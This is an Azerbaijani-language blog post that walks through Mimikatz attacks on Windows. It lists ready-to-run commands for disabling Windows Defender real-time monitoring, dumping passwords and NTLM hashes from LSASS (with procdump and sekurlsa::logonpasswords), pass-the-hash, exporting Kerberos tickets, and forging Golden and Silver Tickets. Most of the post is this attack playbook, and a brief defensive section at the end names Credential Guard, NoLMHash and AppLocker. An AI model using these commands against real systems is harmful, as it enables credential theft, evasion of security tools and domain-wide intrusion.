Mimikatz: Windows Parol və Hash Hücumları

admin
Pentest alətləri

Mimikatz: Windows Parol və Hash Hücumları üçün Güclü Alət

1. Mimikatz Nədir?

Mimikatz Windows üzərində autentifikasiya məlumatlarını əldə etmək, istifadəçi şifrələrini və NTLM hash-ləri çıxarmaq, Kerberos biletlərini oğurlamaq və Pass-the-Hash hücumları həyata keçirmək üçün istifadə edilən açıq mənbəli bir təhlükəsizlik analiz alətidir. Benjamin Delpy tərəfindən hazırlanmışdır və təhlükəsizlik mütəxəssisləri tərəfindən pentest məqsədləri üçün geniş istifadə olunur.

Əsas funksionallıqları:

  • Şifrələr və NTLM hash-lərin çıxarılması
  • Pass-the-Hash və Pass-the-Ticket hücumları
  • Kerberos biletlərinin manipulyasiyası (Golden Ticket və Silver Ticket hücumları)
  • Lateral Movement və Credential Dumping əməliyyatları

2. Mimikatz Quraşdırılması və İşə Salınması

2.1. Mimikatz-ın Endirilməsi

Mimikatz-ı rəsmi GitHub reposundan yükləmək olar:

Invoke-WebRequest -Uri "https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip" -OutFile "mimikatz.zip"
Expand-Archive mimikatz.zip -DestinationPath .
cd mimikatz_trunk

2.2. Mimikatz-ın İcazəli Modda İşlədilməsi

Mimikatz-ı administrator hüquqları ilə işə salmaq vacibdir:

.
mimikatz.exe

Əgər Windows Defender və ya antivirus bunu blok edərsə, PowerShell vasitəsilə işə salına bilər:

Set-MpPreference -DisableRealtimeMonitoring $true

3. Əsas Mimikatz Hücumları

3.1. Windows Şifrələrinin və Hash-lərin Çıxarılması

privilege::debug
sekurlsa::logonpasswords

Bu əmr aktiv istifadəçi sessiyalarına aid şifrələnmiş NTLM hash-ləri və açıq mətndə olan şifrələri çıxarır.

3.2. NTLM Hash-lərlə Pass-the-Hash Hücumu

sekurlsa::pth /user:Administrator /domain:example.local /ntlm:<NTLM Hash>

Bu metod istifadəçi şifrəsini bilmədən autentifikasiya olunmağa imkan verir.

3.3. Kerberoasting Hücumu və Golden Ticket

3.3.1. Kerberos Biletlərinin Çıxarılması

sekurlsa::tickets /export

3.3.2. Golden Ticket Hücumu

Golden Ticket hücumu ilə hücumçu Domain Controller üzərində daimi giriş əldə edə bilər:

kerberos::golden /user:Administrator /domain:example.local /sid:S-1-5-21-0000-1111-2222-3333 /krbtgt:<krbtgt hash> /id:500

3.4. Silver Ticket Hücumu

Silver Ticket hücumu xüsusi bir xidməti (məsələn, SQL Server) istismar etməyə imkan verir:

kerberos::golden /domain:example.local /sid:S-1-5-21-0000-1111-2222-3333 /target:SQLSERVER /service:MSSQLSvc /rc4:<NTLM Hash>

4. Lateral Movement və Credential Dumping

4.1. LSASS Prosesindən Credential Dumping

tasklist /svc | findstr lsass
procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

4.2. Remote Desktop Sessiyalarını Oğurlamaq

sekurlsa::pth /user:Administrator /domain:example.local /ntlm:<NTLM Hash> /run:cmd.exe

Bu əmr ilə hücumçu uzaqdan sessiyalara daxil ola bilər.

5. Müdafiə Mexanizmləri və Qarşısının Alınması

Mimikatz-ın istismar etdiyi zəifliklərə qarşı müdafiə tədbirləri:

  • LSASS prosesinin qorunması üçün Credential Guard aktiv edilməlidir.
  • Administrator və domain admin hesabları məhdudlaşdırılmalıdır.
  • NTLM və LM hash-lərin saxlanılması deaktiv edilməlidir:
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name 'NoLMHash' -Value 1
  • PowerShell skript icrasını məhdudlaşdırmaq üçün AppLocker və ya WDAC istifadə edilməlidir.

6. Nəticə

Mimikatz Windows sistemlərində autentifikasiya və identifikasiya mexanizmlərini sınaqdan keçirmək üçün güclü bir alətdir. Pentest və təhlükəsizlik araşdırmaları üçün istifadə edilən bu alət, eyni zamanda ciddi təhlükəsizlik risklərinə səbəb ola bilər. Müdafiə tədbirləri ilə Mimikatz-ın effektivliyini məhdudlaşdırmaq mümkündür.

Related Posts

Bir cavab yazın

Sizin e-poçt ünvanınız dərc edilməyəcəkdir. Gərəkli sahələr * ilə işarələnmişdir